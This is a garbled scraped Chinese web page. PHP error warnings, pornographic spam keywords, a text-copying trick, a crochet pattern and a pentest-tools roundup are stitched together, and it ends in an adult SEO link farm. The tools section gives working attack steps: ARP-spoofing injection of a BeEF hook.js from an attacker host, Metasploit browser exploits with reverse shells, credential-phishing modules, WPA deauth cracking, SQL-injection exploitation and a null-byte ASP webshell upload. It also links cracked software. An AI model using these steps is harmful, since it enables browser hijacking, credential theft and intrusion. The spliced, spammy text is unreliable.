Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 国产高清在线精品一区a ,成人免费一级毛片在线播放视频 ,国产在线高清一级毛片

          整合營銷服務(wù)商

          電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理

          免費(fèi)咨詢熱線:

          如何一鍵復(fù)制某某文庫不能復(fù)制的內(nèi)容

          如何一鍵復(fù)制某某文庫不能復(fù)制的內(nèi)容

          何一鍵復(fù)制某某文庫不能復(fù)制的內(nèi)容,這里是技巧分享。

          網(wǎng)頁上有時(shí)候能搜索到自己想要的內(nèi)容,但是不能復(fù)制,又是登錄,又是充值等等,很麻煩,有沒有什么簡單的方法呢?

          有,很簡單。直接上干貨。


          問題是這樣的,覺得這篇文章不錯(cuò),但是我只要其中幾句話怎么辦?


          于是我點(diǎn)擊復(fù)制


          結(jié)果彈出這個(gè)東西來,你說我怎么辦呢?

          開始如下,先點(diǎn)擊彈窗右上角關(guān)閉這個(gè)彈窗,按一下鍵盤上的F12按鍵。


          點(diǎn)擊圖片中的右上角的設(shè)置。


          鼠標(biāo)往下滑動(dòng),在Debugger處的禁用javascript處方框內(nèi)點(diǎn)勾,如圖所示。這次再回來點(diǎn)擊復(fù)制文字。


          發(fā)現(xiàn)可以選中復(fù)制了。

          你學(xué)會(huì)了嗎?

          注意:以上測試是win10系統(tǒng)的自帶瀏覽器。

          1、6X

          2、6V

          3、12V

          4、(X、V)*12

          5、36X

          6、鉤內(nèi)半針36X

          7-12、36X

          13、(4X、A)*6

          14、鉤內(nèi)半針30X

          15、(3X、A)*6

          16、(2X、A)*6

          17、(X、A)*6

          18、6A


          臉部

          1、15ch、倒2回鉤V、12X、(4X)、12X、V

          2、2V、12X、4V、12X、2V

          3、(X、V)*2、12X、(X、V)*4、12X、

          (X、V)*2

          4、換棉花糖毛絨白色線,從中間分別往兩邊數(shù)3針不鉤,每個(gè)針目里鉤3F


          眼睛

          1、環(huán)起8X

          2、W、X、W、2X、(4X)、2X

          換白色線

          3、X、W、3X、W、4X、2V、3X

          4、用金色空心紗鉤一圈不加不減的短針


          鼻子

          1、環(huán)起6X

          2、(X、V)*3

          耳朵

          1、環(huán)起6X

          2、(W、X)*3

          換棉花糖白色毛絨線

          3、X、(W、3X)*2、W、2X

          帽子

          1、環(huán)起6X

          2、6X

          3、(X、V)*3

          4-5、9X

          6、(2X、V)*3

          7、12X

          換棉花糖白色毛絨線

          8、1引拔1ch重復(fù)

          鬃毛

          1、環(huán)起5ch,倒2回鉤4X,引拔,重復(fù)4次

          透測試的目的不僅是找到安全系統(tǒng)的易受攻擊元素,還要檢查企業(yè)中安全策略的合規(guī)性,衡量任何安全問題的意識(shí)和范圍,并查看可能性在真正的外部實(shí)體網(wǎng)絡(luò)攻擊事件中,網(wǎng)絡(luò)可能會(huì)遇到什么災(zāi)難。實(shí)質(zhì)上,滲透測試允許你發(fā)現(xiàn)可能沒有考慮過的弱點(diǎn)區(qū)域。滲透測試者提供了一種全新的視角,幫助企業(yè)改進(jìn)系統(tǒng)安全和采用更主動(dòng)的方法。借助專業(yè)工具,滲透測試更加有效和高效,以下介紹10種最佳工具。

          Network Mapper (NMAP)(推薦小伙伴使用谷歌瀏覽器訪問,再使用谷歌翻譯)

          下載地址:https://nmap.org/

          使用方法:

          測試的IP為:163.177.151.110

          Nmap的純掃描

          以下命令的語法如下:
          nmap <目標(biāo)IP地址>
          其中:目標(biāo)IP地址=您的目標(biāo)機(jī)器的指定IP


          NMAP普通掃描增加輸出冗長(非常詳細(xì))
          以下命令的語法如下:
          nmap -vv 10.1.1.254
          其中:-vv=切換以激活日志所需的非常詳細(xì)的設(shè)置


          Nmap的自定義端口掃描
          Nmap的掃描范圍從1-10000的端口默認(rèn)情況下,為了更具體地指定要掃描的端口,我們將使用-p開關(guān)來指定我們的端口掃描范圍,優(yōu)點(diǎn)是它會(huì)更快掃描少量端口而不是預(yù)定義的默認(rèn)值
          語法:
          nmap -p(范圍)<目標(biāo)IP>
          其中:-P是端口交換機(jī)(范圍)是1-65535的端口數(shù) <目標(biāo)IP>是您的特定目標(biāo)IP地址

          該工具可以創(chuàng)建一個(gè)全面的網(wǎng)絡(luò)虛擬地圖,并使用它來查明網(wǎng)絡(luò)攻擊者可以利用的所有主要弱點(diǎn)。NMAP對(duì)滲透測試過程的任何階段都很有用。最重要的是,它是免費(fèi)的。

          Netsparker Security Scanner

          下載地址:https://www.netsparker.com/web-vulnerability-scanner/

          使用方法:

          1. 打開工具,點(diǎn)擊start a new scan,選擇full scan(全部掃描),單擊開始

          1. 在登錄下進(jìn)行掃描

          1. 等待掃描結(jié)果,并分析

          可用的功能將幫助你確定應(yīng)該使用的預(yù)先打包的漏洞,并且還允許你自定義它們;還可以使用IP地址和遠(yuǎn)程端口號(hào)配置它們。此外,還可以使用IP地址和本地端口號(hào)配置有效負(fù)載。然后,你可以在啟動(dòng)預(yù)期目標(biāo)的漏洞之前確定要部署的有效負(fù)載。

          Metasploit還集成了一個(gè)名為Meterpreter的工具,它可以在漏洞發(fā)生時(shí)顯示所有結(jié)果,這意味著你可以毫不費(fèi)力地分析和解釋結(jié)果,并更有效地制定策略。

          BeEF

          下載地址:https://github.com/beefproject/beef

          安裝方式:

          git clone git://github.com/beefproject/beef.git

          cd beef

          bundle install

          ruby beef

          使用方式:

          修改配置文件/usr/share/beef-xss/config.yaml

          (1)改vi beef偵聽端口: http: port:3000(比如改為80)

          (2)與Metaspolit關(guān)聯(lián):

          metasploit: enable: false(改為true)

          like:ssl: false(改為true)

          (3) 配置一下拓展下的metasploit配置文件

          vim /usr/share/beef-xss/extensions/metasploit/config.yaml

          下面的路徑為本機(jī)metasploit的路徑。

          然后開啟metasploit的相關(guān)服務(wù)開啟:# service postgresql start

          在命令行下用msfconsole把控制臺(tái)打開

          接著加載beEF,所用命令為:“l(fā)oad msgrpc ServerHost=127.0.0.1 Pass=abc123”

          或者直接用這個(gè)命令啟動(dòng):

          msfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123"

          下面我們來啟動(dòng)beef

          cd /usr/share/beef-xss/ && ./beef -x

          為了方便,寫個(gè)啟動(dòng)腳本

          #!/bin/bash
          service postgresql start
          msfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123"
          cd /usr/share/beef-xss && ./beef -x

          接口控制面板可以通過http://192.168.1.104:3000/ui/panel來訪問

          默認(rèn)username/passwd是 beef:beef

          控制界面

          默認(rèn)hook js:http://192.168.1.104:3000/hook.js

          默認(rèn)hook頁面: http://192.168.1.104:3000/demos/basic.html   //訪問即可被hook

          好了,現(xiàn)在一切都已經(jīng)準(zhǔn)備好,讓我們用php編寫一個(gè)程序進(jìn)行測試

          vim /var/www/index.html

          <html>
            <head>
              <script src="http://192.168.1.104:3000/hook.js"></script>
            </head>
          </html>

          如果是內(nèi)網(wǎng),也可以利用欺騙劫持勾住目標(biāo)瀏覽器,比如使用mitmf(要以管理員權(quán)限運(yùn)行)

          mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --hsts --inject  --js-url http://192.168.1.104:3000/hook.js
          
          mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.129 --inject --html-url  http://192.168.1.104:3000/demos/basic.html

          鉤住目標(biāo)瀏覽器后,我們可以利用社會(huì)工程來使用戶接受擴(kuò)展。(Social Engineering中的模塊)

          比如:可以發(fā)送叫做:HTML5 Rendering Enhancements的擴(kuò)展給用戶,它會(huì)通過 1337 端口打開 shell。

          還可以配合metasploit進(jìn)一步獲取權(quán)限。如:

          use exploit/windows/browser/java_cmm
          set payload  windows/meterpreter/reverse_tcp

          生成url之后,注入目標(biāo)瀏覽器中,進(jìn)而在msf中獲取shell

          再比如這個(gè)模塊

          use exploit/windows/browser/ie_execcommand_uaf 
          set SRVHOST 192.168.1.104
          set URIPATH /

          我們我們可以看到每一個(gè)tab代表一個(gè)瀏覽器,它有5個(gè)tab-總結(jié)如下:
          Details-顯示被hook的瀏覽器的細(xì)節(jié)。如上圖所示
          Logs-顯示當(dāng)前瀏覽器的log實(shí)體。如下圖所示

          commands-我們可以對(duì)一個(gè)瀏覽器執(zhí)行模塊。模塊可以執(zhí)行可以通過JavaScript來執(zhí)行的任何命令。每一個(gè)模塊有一個(gè)圖標(biāo),表示為如下色彩:

          Green : 可以工作; user不可見 
          Orange :可以工作; user可見 
          Grey : 可能工作 
          Red : 不能工作 

          一些實(shí)用模塊:

          Redirect Browser:進(jìn)行重定向

          方法:右側(cè)填寫木馬的路徑,可以配合插件升級(jí)攻擊

          Social Engineering --> Fake Flash Update

          flash插件升級(jí)

          Social Engineering --> Fake Notification Bar

          功能類似插件升級(jí)

          Social Engineering --> Clippy

          Social Engineering --> Pretty Theft

          竊取登陸憑證

          Misc --> Create Invisible Frame

          注入一個(gè)隱藏的iframe框架

          Metasploit實(shí)用姿勢

          使用Metasploit的Browser Autopwn功能生成一個(gè)瀏覽器攻擊鏈接

          use auxiliary/server/browser_autopwn

          show options

          set LHOST xxx

          set SRVHOST xxx

          set SRVPORT xxxx<br>run -z

          使用"Create Invisible Iframe"模塊加載autopwn頁面

          hook手機(jī)

          由于手機(jī)打開網(wǎng)址持續(xù)的時(shí)間很短,關(guān)閉當(dāng)前頁面后BeEF的shell就會(huì)下線,因此我們可以使用BeEF API,用戶上線后能夠自動(dòng)執(zhí)行批量命令,結(jié)合Persistence模塊能夠極大提高shell存活時(shí)間。除了與windows系統(tǒng)相關(guān)的信息無法獲取,其他操作均能成功執(zhí)行,并且BeEF為手機(jī)劫持提供了專門的模塊系列——Phonegap

          以下是經(jīng)測試可以在Android上使用的模塊:

          1、彈框
          2、重定向 
          3、查看是否訪問過某些網(wǎng)站
          4、Creates an invisible iframe
          5、Social Engineering系列,如下圖,僅作演示 
          6、msf系列
          7、NetWork系列,可以用來掃描同一內(nèi)網(wǎng)下的windows主機(jī)

          BeEF工具最適合檢查Web瀏覽器,因?yàn)樗饕糜趯?duì)抗web攻擊。這就是為什么它最有利于移動(dòng)的客戶。此工具使用GitHub查找漏洞,此工具的最佳之處在于它探索了web邊界和客戶端系統(tǒng)之外的弱點(diǎn)。請記住,這是專門針對(duì)Web瀏覽器的,因?yàn)樗鼤?huì)查看單個(gè)源上下文中的漏洞。它連接多個(gè)Web瀏覽器,允許你啟動(dòng)定向命令模塊。

          Wireshark

          下載地址:https://www.wireshark.org/download.html

          使用方法:

          1、打開wireshark 2.6.5,主界面如下:

          2、選擇菜單欄上Capture -> Option,勾選WLAN網(wǎng)卡(這里需要根據(jù)各自電腦網(wǎng)卡使用情況選擇,簡單的辦法可以看使用的IP對(duì)應(yīng)的網(wǎng)卡)。點(diǎn)擊Start。啟動(dòng)抓包。

          3、wireshark啟動(dòng)后,wireshark處于抓包狀態(tài)中。

          4、執(zhí)行需要抓包的操作,如ping www.baidu.com。

          5、操作完成后相關(guān)數(shù)據(jù)包就抓取到了。為避免其他無用的數(shù)據(jù)包影響分析,可以通過在過濾欄設(shè)置過濾條件進(jìn)行數(shù)據(jù)包列表過濾,獲取結(jié)果如下。說明:ip.addr==119.75.217.26 and icmp 表示只顯示ICPM協(xié)議且源主機(jī)IP或者目的主機(jī)IP為119.75.217.26的數(shù)據(jù)包。

          5、wireshark抓包完成,就這么簡單。關(guān)于wireshark過濾條件和如何查看數(shù)據(jù)包中的詳細(xì)內(nèi)容在后面介紹。

          Wireshakr抓包界面

          說明:數(shù)據(jù)包列表區(qū)中不同的協(xié)議使用了不同的顏色區(qū)分。協(xié)議顏色標(biāo)識(shí)定位在菜單欄View --> Coloring Rules。如下所示

          該工具提供的最大優(yōu)勢是分析結(jié)果的產(chǎn)生方式使用戶輕松理解。滲透測試者可以使用此工具執(zhí)行許多不同的操作,包括顏色編碼,以便進(jìn)行更深入的調(diào)查,并隔離最重要的單個(gè)數(shù)據(jù)包。在分析基于Web的應(yīng)用上發(fā)布到表單的信息和數(shù)據(jù)所固有的安全風(fēng)險(xiǎn)時(shí),此工具非常方便。

          w3af

          下載地址:http://w3af.org/download

          使用方法:

          root@bt:~# cd /pentest/web/w3af/
          root@bt:/pentest/web/w3af# ./w3af_console


          0x04 漏洞掃描配置


          w3af>>> plugins
          //進(jìn)入插件模塊
          w3af/plugins>>> list discovery 
          //列出所有用于發(fā)現(xiàn)的插件
          w3af/plugins>>> discovery findBackdoor phpinfo webSpider 
          //啟用findBackdoor phpinfo webSpider這三個(gè)插件
          w3af/plugins>>> list audit 
          //列出所有用于漏洞的插件
          w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss 
          //啟用blindSqli fileUpload osCommanding sqli xss這五個(gè)插件
          w3af/plugins>>> back
          //返回主模塊
          w3af>>> target
          //進(jìn)入配置目標(biāo)的模塊
          w3af/config:target>>> set target http://192.168.244.132/
          //把目標(biāo)設(shè)置為http://192.168.244.132/
          w3af/config:target>>> back
          //返回主模塊


          0x05 漏洞掃描


          w3af>>> start


          ---
          New URL found by phpinfo plugin: http://192.168.244.132/
          New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php
          New URL found by phpinfo plugin: http://192.168.244.132/index.php
          New URL found by webSpider plugin: http://192.168.244.132/
          New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
          New URL found by webSpider plugin: http://192.168.244.132/index.php
          Found 3 URLs and 8 different points of injection.
          The list of URLs is:
          - http://192.168.244.132/index.php
          - http://192.168.244.132/checklogin.php
          - http://192.168.244.132/
          The list of fuzzable requests is:
          - http://192.168.244.132/ | Method: GET
          - http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")
          - http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")
          - http://192.168.244.132/checklogin.php | Method: GET
          - http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")
          - http://192.168.244.132/index.php | Method: GET
          - http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")
          - http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")
          Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
          A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
          A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
          SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
          Scan finished in 19 seconds.
          ---
          //開始掃描


          0x06 漏洞利用配置


          w3af>>> exploit 
          //進(jìn)入漏洞利用模塊
          w3af/exploit>>> list exploit
          //列出所有用于漏洞利用的插件
          w3af/exploit>>> exploit sqlmap 
          //使用sqlmap進(jìn)行SQL注入漏洞的測試


          ---
          Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...
          Vulnerability successfully exploited. This is a list of available shells and proxies:
          - [0] <sql object ( dbms: "MySQL >=5.0.0" | ruser: "root@localhost" )>
          Please use the interact command to interact with the shell objects.
          ---
          //測試存在SQL注入漏洞
          //這里要記住shell objects(這里是0),等一下要用到
          0x07 漏洞利用
          w3af/exploit>>> interact 0
          //interact + shell object就可以利用了
          
          ---
          Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
          w3af/exploit/sqlmap-0>>> 
          ---
          //sqlmap的一個(gè)交互式模塊
          
          w3af/exploit/sqlmap-0>>> dbs   
          
          ---
          Available databases:  [3]:

          使W3AF成為一個(gè)完整工具的原因是參數(shù)和變量可以快速保存到會(huì)話管理器文件中。這意味著它們可以快速重新配置并重新用于Web應(yīng)用上的其他滲透測試,從而為你節(jié)省大量時(shí)間,因?yàn)槟悴槐卦诿看涡枰獣r(shí)重新輸入所有參數(shù)和變量。此外,測試結(jié)果以圖形和文本格式顯示,使其易于理解。

          Acunetix Scanner

          下載地址:http://www.downza.cn/soft/286127.html

          使用方法:

          1、選擇“Tools Explorer”下的“Web Scanner”,鼠標(biāo)右鍵出現(xiàn)選項(xiàng)菜單,選擇“ New scan”


          彈出“Scan Wizard”掃描向?qū)?輸入您所要測試的網(wǎng)址


          然后一直點(diǎn)擊下一步,如果要測試的網(wǎng)站是需要登陸才能進(jìn)入的web,則配置一下登陸信息,點(diǎn)擊“New Login Sequence”按照步驟一步一步登陸,讓軟件記錄下你的登 錄信息。完成之后繼續(xù)next。



          當(dāng)出現(xiàn)下圖的操作時(shí),則說明準(zhǔn)備工作已經(jīng)做好,點(diǎn)擊“finish”按鈕,可以開始掃描



          掃描結(jié)束后如下圖所示:

          它涵蓋了超過4500個(gè)弱點(diǎn)。登錄序列記錄器易于使用;它會(huì)掃描受密碼保護(hù)的區(qū)域。該工具包含AcuSensor技術(shù),手動(dòng)滲透工具和內(nèi)置漏洞測試。它可以快速抓取數(shù)千個(gè)網(wǎng)頁,也可以在本地或通過云解決方案運(yùn)行。

          John the Ripper

          下載地址:https://www.openwall.com/john/

          使用方法:

          【命令列指令】

          john [-命令列參數(shù)] [密碼檔名稱]

          【命令列參數(shù)】

          參數(shù):-single
          說明:使用「簡單」(Single Crack)破解模式解密,主要是根據(jù)使用者的「賬號(hào)」產(chǎn)生變化來猜測解密,其變化規(guī)則記錄在JOHN.INI檔案的 [List.Rules:Single] 區(qū)域內(nèi)。(稍后會(huì)再介紹)

          案例1:john -single passwd

          參數(shù):-wordfile:[字典檔檔名] -stdin

          說明:使用「字典檔」破解模式解密,由字典檔內(nèi)讀取單字來破解;或是可以加上-stdin參數(shù),代表由鍵盤輸入單字來破解。

          案例2:john -wordfile:bigdict.dic passwd

          參數(shù):-rules
          說明:在「字典檔」破解模式下,開啟字詞規(guī)則變化功能,如「字典檔」讀入單字cook,則開啟字詞變化下,程式可能會(huì)嘗試cook、c00k、 cooker、cook0…等其它字詞。詳細(xì)變化規(guī)則記錄在JOHN.INI檔案的 [List.Rules:Wordlist] 區(qū)域內(nèi)。(稍后會(huì)再介紹)

          案例3:john -wordfile:bigdict.dic -rules passw

          參數(shù):-incremental[:模式名稱](參數(shù)也可以簡寫成 -i[:模式名稱])
          說明:使用「增強(qiáng)」破解模式解密,就是組合所有可能的資源當(dāng)作密碼來破解。在 JOHN.INI檔案內(nèi)的 [Incremental:*****] 區(qū)域里定義好許多的模式名稱,可以指定使用哪一個(gè)模式來破解。(稍后會(huì)再介紹)

          案例4:john -i:all passwd

          參數(shù):-external:[模組名稱]
          說明:使用「外掛模組」破解模式解密,使用者可以自己撰寫額外的「破解模組程式」。「破解模組程式」是記錄在JOHN.INI檔案內(nèi)的 [List.External:******] 區(qū)域內(nèi)。

          這是一個(gè)眾所周知的工具,是一個(gè)非常優(yōu)雅和簡單的密碼破解工具。此工具允許你確定數(shù)據(jù)庫中的任何未知弱點(diǎn),它通過從傳統(tǒng)字典中找到的復(fù)雜和流行單詞的單詞列表中獲取文本字符串樣本,并使用與正在生成的密碼相同的格式對(duì)其進(jìn)行加密來實(shí)現(xiàn)此目的。簡單而有效的John the Ripper是任何精心準(zhǔn)備的滲透測試儀工具包中的一個(gè)強(qiáng)烈推薦的補(bǔ)充。

          Aircrack mainly

          下載地址:http://aircrack-ng.org/

          使用方法:

          Ifconfigwlan0 up 掛載無線網(wǎng)卡

          Airmon-ngstart wlan0 激活無線網(wǎng)卡為監(jiān)聽模式

          Airodump-ngmon0抓包

          Airodump-ng –ivs –w shujubao –c 6 wlan0 抓包并保存

          --ivs 這里是設(shè)置過濾,只保存用于破解的ivs文件,可以不加這個(gè)參數(shù)的,信道是多少寫多少,一般是6,這個(gè)可以在抓包的時(shí)候看到,這一步可能會(huì)抓到好幾個(gè)路由器的報(bào)文,選擇自己要的就是了。

          Airplay-ng -3 –b 目標(biāo)MAC –h 客戶端MAC mon0

          -3是指采用arprequesr注入***模式(后面會(huì)提到參數(shù)0)

          等待一段時(shí)間,具體等多少,就是等1000個(gè)以上的數(shù)據(jù)包吧,保險(xiǎn)可以多等一會(huì)

          Aircrack-ng shujubao-01.ivs 進(jìn)行破解了,這種模式好破,當(dāng)然拿windows下面破利用GPU加速更快。

          Wpa加密破解:

          前面都一樣抓包的時(shí)候使用如下命令:

          Airodump-ng -c 6 –w shujubao mon0

          Aireplay-ng -0 10 –a 目標(biāo)MAC –c 客戶端MAC wlan0(參數(shù)與WEP有很大不同)

          -0采用deauth***模式,后面是***次數(shù),一般1次有效就好了。

          屏幕上出現(xiàn)了:WPA handshake說明抓到了握手包

          Aircrack-ng –w dic shujubao-01.cap

          這里面需要自己制作字典,建議在win下面破解,字典工具也多,自己做一個(gè)就好了。也可以扔到網(wǎng)站上破解,他們應(yīng)該有超大的彩虹表吧,個(gè)人感覺對(duì)于復(fù)雜的wpa2密碼,這種***方式不是很好用,運(yùn)氣不好,要破幾個(gè)月也是有可能,當(dāng)然我沒有驗(yàn)證,懶。不過這種方法確實(shí)是萬能的,限制條件不多。

          Burp Suite Pen Tester

          下載地址:https://pan.baidu.com/s/1mJdRZqSr5A0W9aWEcs3ySg 密碼: 293x (壓縮包內(nèi)已包含注冊機(jī)Loader)

          運(yùn)行Burp site,點(diǎn)擊Proxy標(biāo)簽,確認(rèn)Options選項(xiàng)卡下,Proxy listeners的running運(yùn)行正常(勾選狀態(tài)為運(yùn)行),如果端口打開失敗,可能的原因是有程序占用了該端口,點(diǎn)擊edit,在local listener port:輸入框輸入一個(gè)未占用的端口,點(diǎn)擊update即可。我這里將端口改為了8082

          打開http://192.168.8.120/test/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg,進(jìn)入上傳頁面,選擇我們的asp木馬,然后設(shè)置瀏覽器代理地址為127.0.0.1,端口為8082,點(diǎn)擊開始上傳,burp suite截獲數(shù)據(jù)包,點(diǎn)擊forward按鈕,返回結(jié)果如圖所示。

          到這里所用到的數(shù)據(jù)包已經(jīng)成功捕獲,切換到history選項(xiàng)卡,右鍵剛剛捕獲的post數(shù)據(jù)包,選擇send to repeater。

          更改filepath值”bookpic/”為”bookpic/shell.asp “(asp后有一空格),然后把filename的值”C:\Documents andSettings\Administrator\Desktop\unset.asp”改成”C:\Documents andSettings\Administrator\Desktop\unset.jpg”,Content-Length的值不用更改,程序會(huì)在提交請求的時(shí)候自動(dòng)更新該值。

          然后切換到hex選項(xiàng)卡,找到上傳路徑”bookpic/shell.asp “所處位置,把20改成00,然后點(diǎn)擊GO,成功上傳aspshell到http://192.168.8.120/test/bookpic/shell.asp。

          此工具包含成功執(zhí)行掃描活動(dòng)和高級(jí)滲透測試的所有基本要素,使其成為檢查基于Web應(yīng)用的理想選擇,因?yàn)樗糜诜治瞿繕?biāo)服務(wù)器和瀏覽器之間請求的工具。它通過在Java平臺(tái)上使用Web滲?透測試來實(shí)現(xiàn)。它可用于許多不同的操作系統(tǒng),包括Windows,Linux和OS X.


          主站蜘蛛池模板: 久久国产午夜精品一区二区三区| 日韩精品无码人妻一区二区三区| 国产乱人伦精品一区二区在线观看| 国产丝袜无码一区二区三区视频| 精品一区二区三区四区| 亚洲国产成人精品无码一区二区 | 无码日韩人妻AV一区二区三区| 久久国产三级无码一区二区| 性色av一区二区三区夜夜嗨| 麻豆AV天堂一区二区香蕉| 久久精品一区二区国产| 午夜一区二区免费视频| 91久久精品无码一区二区毛片| 国产高清一区二区三区四区| 亚洲狠狠狠一区二区三区| 国产麻豆精品一区二区三区v视界| 国产激情一区二区三区四区 | 中文激情在线一区二区| 国产一区二区在线看| 国产精品毛片一区二区| 精品不卡一区中文字幕| 精品一区二区三区电影| 国产日韩精品一区二区在线观看播放| 99精品久久精品一区二区| 精品无码人妻一区二区三区品 | 国产精品亚洲一区二区三区在线| 高清国产AV一区二区三区| 精品午夜福利无人区乱码一区| 日韩一区二区在线观看视频| 亚洲国产精品一区第二页| 亚洲综合av一区二区三区不卡| 日韩电影在线观看第一区| 国产精品特级毛片一区二区三区| 精品国产伦一区二区三区在线观看| 人妻少妇一区二区三区| 亚洲成av人片一区二区三区 | 国产精品视频一区二区三区经 | 亚洲综合一区二区| 97人妻无码一区二区精品免费| 国模私拍福利一区二区| 亚洲欧美国产国产综合一区|